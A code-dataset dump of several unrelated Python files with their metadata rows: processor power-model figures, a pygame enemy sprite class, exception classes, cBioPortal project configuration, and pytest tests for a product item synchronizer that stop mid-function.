'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.186192,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0190379,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.438593,
'Memory Management Unit/Runtime Dynamic': 0.075569,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.831,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.258477,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0102683,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.075574,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.344319,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.83098,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 6.584845843509205,
'Runtime Dynamic': 6.584845843509205,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.264685,
'Runtime Dynamic': 0.102516,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 82.1344,
'Peak Power': 115.247,
'Runtime Dynamic': 20.3579,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 81.8697,
'Total Cores/Runtime Dynamic': 20.2554,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.264685,
'Total L3s/Runtime Dynamic': 0.102516,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.062363 | 124 | 0.68184 | 8,098 | 68,607 | 5.770684 | 0.067795 | 0.123601 | 0.112987 | 0.093471 | 0.939184 | 0.931865 | 0.91847 | 0.886735 | 0.863495 | 0.844258 | 0 | 0.131314 | 0.224336 | 68,607 | 914 | 125 | 75.062363 | 0.746824 | 0 | 0 | 0.642232 | 0 | 0 | 0.657431 | 0.048099 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f11f21144618727f91bf86ddc21e5350a3a8f977 | 7,443 | py | Python | src/enemy.py | camelNotationsdjkh/Pento-s-Pledge | 575bb4eb42a5e6ee5dc89de8c995e4952076f2f5 | [
"CC0-1.0"
] | null | null | null | src/enemy.py | camelNotationsdjkh/Pento-s-Pledge | 575bb4eb42a5e6ee5dc89de8c995e4952076f2f5 | [
"CC0-1.0"
] | null | null | null | src/enemy.py | camelNotationsdjkh/Pento-s-Pledge | 575bb4eb42a5e6ee5dc89de8c995e4952076f2f5 | [
"CC0-1.0"
] | null | null | null | #! python3
# enemy.py
""" The class for the enemies of the game """
import pygame, constants, random
from spritesheet_functions import SpriteSheet
class Mob(pygame.sprite.Sprite):
    """ A horizontally patrolling enemy.

    Walks back and forth between ``bounds_left`` and ``bounds_right`` at a
    random speed, animating through walk-cycle frames cut from the given
    sprite sheet.  The frame layout depends on the monster ``type``.
    """

    # Per-type sprite-sheet layout: the (x, y, width, height) source
    # rectangles of the right-facing walk frames, plus the (width, height)
    # each frame is scaled to on screen.  Unknown types fall back to the
    # goblin layout, matching the original if/elif/else chain.
    _FRAME_SPECS = {
        "skeleton": (
            [(16, 0, 37, 46), (81, 0, 34, 46), (146, 0, 34, 46),
             (211, 0, 34, 46), (274, 0, 34, 46), (335, 0, 34, 46),
             (401, 0, 34, 46), (465, 0, 34, 46), (528, 0, 34, 46)],
            (45, 60),
        ),
        "wolf": (
            [(0, 0, 62, 32), (64, 0, 62, 32), (128, 0, 62, 32),
             (192, 0, 62, 32), (256, 0, 62, 32)],
            (80, 40),
        ),
        "goblin": (
            [(0, 0, 40, 53), (63, 0, 40, 53), (128, 0, 40, 53),
             (192, 0, 40, 53), (253, 0, 40, 53)],
            (50, 60),
        ),
    }

    def __init__(self, x, y, level, mob_sheet, bounds_left, bounds_right, type="skeleton"):
        """ Build the mob at (x, y) with patrol bounds in world coordinates.

        ``type`` is kept as a parameter name (despite shadowing the
        builtin) for backward compatibility with existing callers.
        """
        super().__init__()
        self.walking_frames_l = []
        self.walking_frames_r = []
        self.direction = "R"  # direction to start off in
        self.boundary_left = bounds_left
        self.boundary_right = bounds_right
        self.change_x = random.randint(2, 5)  # Random speed
        sprite_sheet = SpriteSheet(mob_sheet, True)
        # Cut and scale the right-facing frames, then mirror them for the
        # left-facing set.  This replaces the hand-unrolled per-frame code.
        rects, size = self._FRAME_SPECS.get(type, self._FRAME_SPECS["goblin"])
        for rect in rects:
            frame = sprite_sheet.get_image(*rect)
            self.walking_frames_r.append(pygame.transform.scale(frame, size))
        for frame in self.walking_frames_r:
            self.walking_frames_l.append(pygame.transform.flip(frame, True, False))
        self.image = pygame.image.load("images/coin_sheet.png")  # Starting image
        self.rect = self.image.get_rect()
        self.rect.x = x
        self.rect.y = y
        self.level = level

    def update(self):
        """ Move one step, bounce off the patrol bounds and animate. """
        self.rect.x += self.change_x
        # Bounds are in world coordinates, so undo the camera shift first.
        pos = self.rect.x - self.level.world_shift
        if pos < self.boundary_left or pos > self.boundary_right:
            self.change_x *= -1
        # Face the direction of travel and pick the matching frame list.
        self.direction = "L" if self.change_x < 0 else "R"
        frames = self.walking_frames_r if self.direction == "R" else self.walking_frames_l
        self.image = frames[(pos // 20) % len(frames)]
| 47.407643 | 92 | 0.602311 | 962 | 7,443 | 4.448025 | 0.138254 | 0.177378 | 0.274129 | 0.19771 | 0.770741 | 0.748773 | 0.741762 | 0.72774 | 0.70437 | 0.700865 | 0 | 0.035721 | 0.296655 | 7,443 | 156 | 93 | 47.711538 | 0.781662 | 0.071477 | 0 | 0.504348 | 0 | 0 | 0.00687 | 0.003206 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017391 | false | 0 | 0.017391 | 0 | 0.043478 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2d1877495e12602424aa2ccc0abda37b92ab3629 | 65 | py | Python | conftest.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 1 | 2022-03-03T09:55:57.000Z | 2022-03-03T09:55:57.000Z | conftest.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 7 | 2022-02-09T10:44:53.000Z | 2022-03-28T03:29:43.000Z | conftest.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | null | null | null | from api.tests.fixtures import *
from db.tests.fixtures import *
| 21.666667 | 32 | 0.784615 | 10 | 65 | 5.1 | 0.6 | 0.509804 | 0.745098 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123077 | 65 | 2 | 33 | 32.5 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
74112819e6d57bf5112e0666d987129e9462f221 | 670 | py | Python | smartcloudadmin/exceptions.py | ironwill1023/BSS-admin | c4ba6ee07c3a73a6d7070797f0bf3732f8becce5 | [
"MIT"
] | 1 | 2020-02-01T20:36:40.000Z | 2020-02-01T20:36:40.000Z | smartcloudadmin/exceptions.py | ironwill1023/BSS-admin | c4ba6ee07c3a73a6d7070797f0bf3732f8becce5 | [
"MIT"
] | 3 | 2019-03-22T16:09:09.000Z | 2019-04-23T13:02:16.000Z | smartcloudadmin/exceptions.py | cathaldi/smartcloud-administrator | 1c724bb767522d3970d16d88f4cfb39de0bb22af | [
"MIT"
] | null | null | null |
class BssServerError(Exception):
    """Raised when the BSS server rejects an operation.

    e.g. suspending an org that is already suspended,
    activating an org that is already active,
    or trying to add a subscription when it is deleted.
    """
    pass
class BssResourceNotFound(Exception):
    """Raised when a requested BSS resource cannot be found.

    NOTE(review): the original docstring was copy-pasted from
    BssServerError (suspension examples); confirm the intended
    examples for this error with the callers that raise it.
    """
    pass
class BSSBadData(Exception):  # 5XX
    """Raised when the BSS server returns bad data.

    NOTE(review): the inline comment suggests this corresponds to 5XX
    server responses — confirm.  The original docstring was copy-pasted
    from BssServerError and did not describe this error.
    """
    pass
| 22.333333 | 53 | 0.677612 | 94 | 670 | 4.829787 | 0.308511 | 0.066079 | 0.118943 | 0.145374 | 0.867841 | 0.867841 | 0.867841 | 0.867841 | 0.867841 | 0.867841 | 0 | 0.002012 | 0.258209 | 670 | 29 | 54 | 23.103448 | 0.911469 | 0.677612 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
741293be564c2c646d14961962ad78a43d250b1e | 5,082 | py | Python | geniesp/bpc_config.py | thomasyu888/GENIE-Sponsored-Projects | 3f2ae3a375f28e2b83a252ff3d0ea7ac4936e9fa | [
"MIT"
] | 1 | 2020-09-23T18:10:51.000Z | 2020-09-23T18:10:51.000Z | geniesp/bpc_config.py | thomasyu888/GENIE-Sponsored-Projects | 3f2ae3a375f28e2b83a252ff3d0ea7ac4936e9fa | [
"MIT"
] | null | null | null | geniesp/bpc_config.py | thomasyu888/GENIE-Sponsored-Projects | 3f2ae3a375f28e2b83a252ff3d0ea7ac4936e9fa | [
"MIT"
] | null | null | null | """
BPC configuration classes
>>> git clone https://github.com/cBioPortal/cbioportal.git
>>> python run_bpc.py NSCLC ../../cbioportal 1.1-consortium --staging
"""
from .bpc_redcap_export_mapping import BpcProjectRunner
class Brca(BpcProjectRunner):
    """BrCa BPC sponsored project"""

    # Sponsored project name
    _SPONSORED_PROJECT = "BrCa"
    # Synapse id (with version) of the REDCap-code -> cBioPortal mapping table
    _REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
    # Mapping from Synapse Table to form (derived files)
    _DATA_TABLE_IDS = "syn22296821"
    # Storage of not found samples
    _SP_REDCAP_EXPORTS_SYNID = "syn21446571"
    # main GENIE release folder (11.0-public)
    _MG_RELEASE_SYNID = "syn26706564"
    # Run `git rev-parse HEAD` in Genie_processing directory to
    # obtain shadigest
    _GITHUB_REPO = (
        "https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
        # "tree/a672a70ad5195e6e8359325f5cea10bef384b2ff/"
        # "geniesp/bpc_config.py"
    )
class Crc(BpcProjectRunner):
    """CRC BPC sponsored project"""

    # Sponsored project name
    _SPONSORED_PROJECT = "CRC"
    # Synapse id (with version) of the REDCap-code -> cBioPortal mapping table
    _REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
    # Mapping from Synapse Table to form (derived files)
    # TODO: Make versioned
    _DATA_TABLE_IDS = "syn22296821"
    # Storage of not found samples
    _SP_REDCAP_EXPORTS_SYNID = "syn21446571"
    # main GENIE release folder (11.0-public)
    _MG_RELEASE_SYNID = "syn26706564"
    # Run `git rev-parse HEAD` in Genie_processing directory to
    # obtain shadigest
    _GITHUB_REPO = (
        "https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
        # "tree/765a209402a0e4c8517ec826ddad1f05d842f54a/"
        # "geniesp/bpc_config.py"
    )
class Nsclc(BpcProjectRunner):
    """NSCLC BPC sponsored project"""

    # Sponsored project name
    _SPONSORED_PROJECT = "NSCLC"
    # Synapse id (with version) of the REDCap-code -> cBioPortal mapping table
    _REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
    # Mapping from Synapse Table to form (derived files)
    _DATA_TABLE_IDS = "syn22296821"
    # Storage of not found samples
    _SP_REDCAP_EXPORTS_SYNID = "syn21446571"
    # main GENIE release folder (11.0-public)
    _MG_RELEASE_SYNID = "syn26706564"
    # Run `git rev-parse HEAD` in Genie_processing directory to
    # obtain shadigest
    _GITHUB_REPO = (
        "https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
        # "tree/765a209402a0e4c8517ec826ddad1f05d842f54a/"
        # "geniesp/bpc_config.py"
    )
    # Derived files left out of this project's export
    # (presumably consumed by BpcProjectRunner — confirm there)
    _exclude_files = ["data_timeline_labtest.txt"]
class Panc(BpcProjectRunner):
    """PANC BPC sponsored project"""

    # Sponsored project name
    _SPONSORED_PROJECT = "PANC"
    # Synapse id (with version) of the REDCap-code -> cBioPortal mapping table
    _REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
    # Mapping from Synapse Table to form (derived files)
    _DATA_TABLE_IDS = "syn22296821"
    # Storage of not found samples
    _SP_REDCAP_EXPORTS_SYNID = "syn21446571"
    # main GENIE release folder (11.0-public)
    _MG_RELEASE_SYNID = "syn26706564"
    # Run `git rev-parse HEAD` in Genie_processing directory to
    # obtain shadigest
    _GITHUB_REPO = (
        "https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
        # "tree/a672a70ad5195e6e8359325f5cea10bef384b2ff/"
        # "geniesp/bpc_config.py"
    )
class Prostate(BpcProjectRunner):
    """Prostate BPC sponsored project"""

    # Sponsored project name
    _SPONSORED_PROJECT = "Prostate"
    # Synapse id (with version) of the REDCap-code -> cBioPortal mapping table
    _REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
    # Mapping from Synapse Table to form (derived files)
    _DATA_TABLE_IDS = "syn22296821"
    # Storage of not found samples
    _SP_REDCAP_EXPORTS_SYNID = "syn21446571"
    # main GENIE release folder (11.0-public)
    _MG_RELEASE_SYNID = "syn26706564"
    # Run `git rev-parse HEAD` in Genie_processing directory to
    # obtain shadigest
    _GITHUB_REPO = (
        "https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
        # "tree/a672a70ad5195e6e8359325f5cea10bef384b2ff/"
        # "geniesp/bpc_config.py"
    )
class Bladder(BpcProjectRunner):
    """BLADDER BPC sponsored project"""

    # Sponsored project name
    _SPONSORED_PROJECT = "BLADDER"
    # Synapse id (with version) of the REDCap-code -> cBioPortal mapping table
    _REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
    # Mapping from Synapse Table to form (derived files)
    _DATA_TABLE_IDS = "syn22296821"
    # Storage of not found samples
    _SP_REDCAP_EXPORTS_SYNID = "syn21446571"
    # main GENIE release folder (11.0-public)
    _MG_RELEASE_SYNID = "syn26706564"
    # Run `git rev-parse HEAD` in Genie_processing directory to
    # obtain shadigest
    _GITHUB_REPO = (
        "https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
        # "tree/a672a70ad5195e6e8359325f5cea10bef384b2ff/"
        # "geniesp/bpc_config.py"
    )
    # Derived files left out of this project's export
    # (presumably consumed by BpcProjectRunner — confirm there)
    _exclude_files = ["data_timeline_labtest.txt"]
| 35.788732 | 71 | 0.708973 | 589 | 5,082 | 5.893039 | 0.151104 | 0.082973 | 0.028234 | 0.048401 | 0.907808 | 0.906367 | 0.906367 | 0.906367 | 0.85883 | 0.85883 | 0 | 0.091988 | 0.20425 | 5,082 | 141 | 72 | 36.042553 | 0.76632 | 0.482881 | 0 | 0.666667 | 0 | 0 | 0.287461 | 0.019716 | 0 | 0 | 0 | 0.007092 | 0 | 1 | 0 | false | 0 | 0.017544 | 0 | 0.789474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
7423c1e84d7b08ac0fdfc7e1b58f81398a75b855 | 108 | py | Python | ex2.py | SunWalter/Hard | 078579bb6344e7f34fff8f9ad9a8c8f7e1462400 | [
"Apache-2.0"
] | null | null | null | ex2.py | SunWalter/Hard | 078579bb6344e7f34fff8f9ad9a8c8f7e1462400 | [
"Apache-2.0"
] | null | null | null | ex2.py | SunWalter/Hard | 078579bb6344e7f34fff8f9ad9a8c8f7e1462400 | [
"Apache-2.0"
] | null | null | null | # this is a commend
print ("Testing a sentence") # this is a commend also.
print ("This is a # character")
| 27 | 55 | 0.685185 | 18 | 108 | 4.111111 | 0.5 | 0.243243 | 0.283784 | 0.378378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.203704 | 108 | 3 | 56 | 36 | 0.860465 | 0.388889 | 0 | 0 | 0 | 0 | 0.619048 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
7450319861e37e19801e66cb9fbcfc29a9ddd916 | 33,904 | py | Python | tests/plugins/product/sync/test_items.py | maxipavlovic/connect-cli | 73989c076c6fb5b4562c61a351448b1c77556676 | [
"Apache-2.0"
] | 12 | 2020-10-10T10:53:16.000Z | 2022-02-16T10:15:56.000Z | tests/plugins/product/sync/test_items.py | maxipavlovic/connect-cli | 73989c076c6fb5b4562c61a351448b1c77556676 | [
"Apache-2.0"
] | 37 | 2020-09-28T12:00:52.000Z | 2021-12-20T12:38:25.000Z | tests/plugins/product/sync/test_items.py | maxipavlovic/connect-cli | 73989c076c6fb5b4562c61a351448b1c77556676 | [
"Apache-2.0"
] | 11 | 2020-11-04T18:17:01.000Z | 2022-02-23T08:18:07.000Z | import pytest
from connect.cli.plugins.product.sync.items import ItemSynchronizer
from connect.client import ConnectClient
def test_init(get_sync_items_env):
    """`open` returns the product id stored in the items workbook."""
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)

    product_id = synchronizer.open('./tests/fixtures/items_sync.xlsx', 'Items')

    assert product_id == 'PRD-276-377-545'
def test_skipped(get_sync_items_env):
    """The fixture workbook yields one skipped row and no errors."""
    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open('./tests/fixtures/items_sync.xlsx', 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated, errors) == (1, 0, 0, {})
@pytest.mark.parametrize('row_action', ('delete', 'update'))
def test_validate_row_errors_no_row_id(fs, get_sync_items_env, row_action):
    """Rows with neither `ID` nor `MPN` are rejected for delete/update."""
    worksheet = get_sync_items_env['Items']
    for cell, value in (('A2', None), ('B2', None), ('C2', row_action)):
        worksheet[cell].value = value
    workbook = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook)

    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook, 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: [f'one between the item `ID` or `MPN` is required for the `{row_action}` action.'],
    }
def test_validate_delete_published_item(fs, get_sync_items_env):
    """Deleting a non-draft item row is rejected."""
    worksheet = get_sync_items_env['Items']
    worksheet['C2'].value = 'delete'
    workbook = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook)

    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook, 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['the item status must be `draft` for the `delete` action.'],
    }
def test_validate_create_published_item(fs, get_sync_items_env):
    """`create` rows must not carry an item `ID`."""
    worksheet = get_sync_items_env['Items']
    worksheet['C2'].value = 'create'
    workbook = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook)

    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook, 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['the `ID` must not be specified for the `create` action.'],
    }
def test_validate_create_no_mpn(fs, get_sync_items_env):
    """`create` rows without an `MPN` are rejected."""
    worksheet = get_sync_items_env['Items']
    for cell, value in (('A2', None), ('B2', None), ('C2', 'create')):
        worksheet[cell].value = value
    workbook = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook)

    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook, 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['the item `MPN` is required.'],
    }
def test_validate_create_no_nome(fs, get_sync_items_env):
    """`create` rows without a `Name` are rejected (function name sic)."""
    worksheet = get_sync_items_env['Items']
    for cell, value in (('A2', None), ('D2', None), ('C2', 'create')):
        worksheet[cell].value = value
    workbook = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook)

    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook, 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['the item `Name` is required for the `create` action.'],
    }
def test_validate_create_no_description(fs, get_sync_items_env):
    """`create` rows without a `Description` are rejected."""
    worksheet = get_sync_items_env['Items']
    for cell, value in (('A2', None), ('E2', None), ('C2', 'create')):
        worksheet[cell].value = value
    workbook = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook)

    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook, 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['the item `Description` is required for the `create` action.'],
    }
def test_validate_create_strange_type(fs, get_sync_items_env):
    """Only `reservation` and `ppu` are accepted as item types."""
    worksheet = get_sync_items_env['Items']
    for cell, value in (('A2', None), ('F2', 'license'), ('C2', 'create')):
        worksheet[cell].value = value
    workbook = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook)

    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook, 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['the item `Type` must be one between `reservation` or `ppu`, not `license`.'],
    }
def test_validate_wrong_precision_reservation(fs, get_sync_items_env):
    """`reservation` items must use `integer` precision."""
    worksheet = get_sync_items_env['Items']
    for cell, value in (('A2', None), ('G2', 'decimal'), ('C2', 'create')):
        worksheet[cell].value = value
    workbook = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook)

    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook, 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['for items of type `reservation` the `Precision` must be `integer`, not `decimal`.'],
    }
def test_validate_wrong_precision_ppu(fs, get_sync_items_env):
    """Only the documented precision values are accepted for `ppu` items."""
    worksheet = get_sync_items_env['Items']
    cells = (('A2', None), ('F2', 'ppu'), ('G2', 'decimal(12)'), ('C2', 'create'))
    for cell, value in cells:
        worksheet[cell].value = value
    workbook = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook)

    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook, 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated) == (0, 0, 0)
    expected_message = (
        'the item `Precision` must be one between `integer`, `decimal(1)`, `decimal(2)`, '
        '`decimal(4)`, `decimal(8)`, not `decimal(12)`.'
    )
    assert errors == {2: [expected_message]}
def test_validate_wrong_period_ppu(fs, get_sync_items_env):
    """`ppu` items must bill monthly."""
    worksheet = get_sync_items_env['Items']
    cells = (('A2', None), ('F2', 'ppu'), ('I2', 'yearly'), ('C2', 'create'))
    for cell, value in cells:
        worksheet[cell].value = value
    workbook = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook)

    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook, 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated) == (0, 0, 0)
    assert errors == {
        2: ['for items of type `ppu` the `Billing period` must be `monthly`, not `yearly`.'],
    }
def test_validate_wrong_period_reservation(fs, get_sync_items_env):
    """Only the documented billing periods are accepted."""
    worksheet = get_sync_items_env['Items']
    for cell, value in (('A2', None), ('I2', 'century'), ('C2', 'create')):
        worksheet[cell].value = value
    workbook = f'{fs.root_path}/test.xlsx'
    get_sync_items_env.save(workbook)

    client = ConnectClient(
        use_specs=False,
        api_key='ApiKey SU:123',
        endpoint='https://localhost/public/v1',
    )
    synchronizer = ItemSynchronizer(client=client, silent=True)
    synchronizer.open(workbook, 'Items')

    skipped, created, updated, _deleted, errors = synchronizer.sync()

    assert (skipped, created, updated) == (0, 0, 0)
    expected_message = (
        'the item `Billing period` must be one between `onetime`, `monthly`, `yearly`, '
        '`2 years`, `3 years`, `4 years`, `5 years`, not `century`.'
    )
    assert errors == {2: [expected_message]}
def test_create_item_exists_in_connect(
    fs,
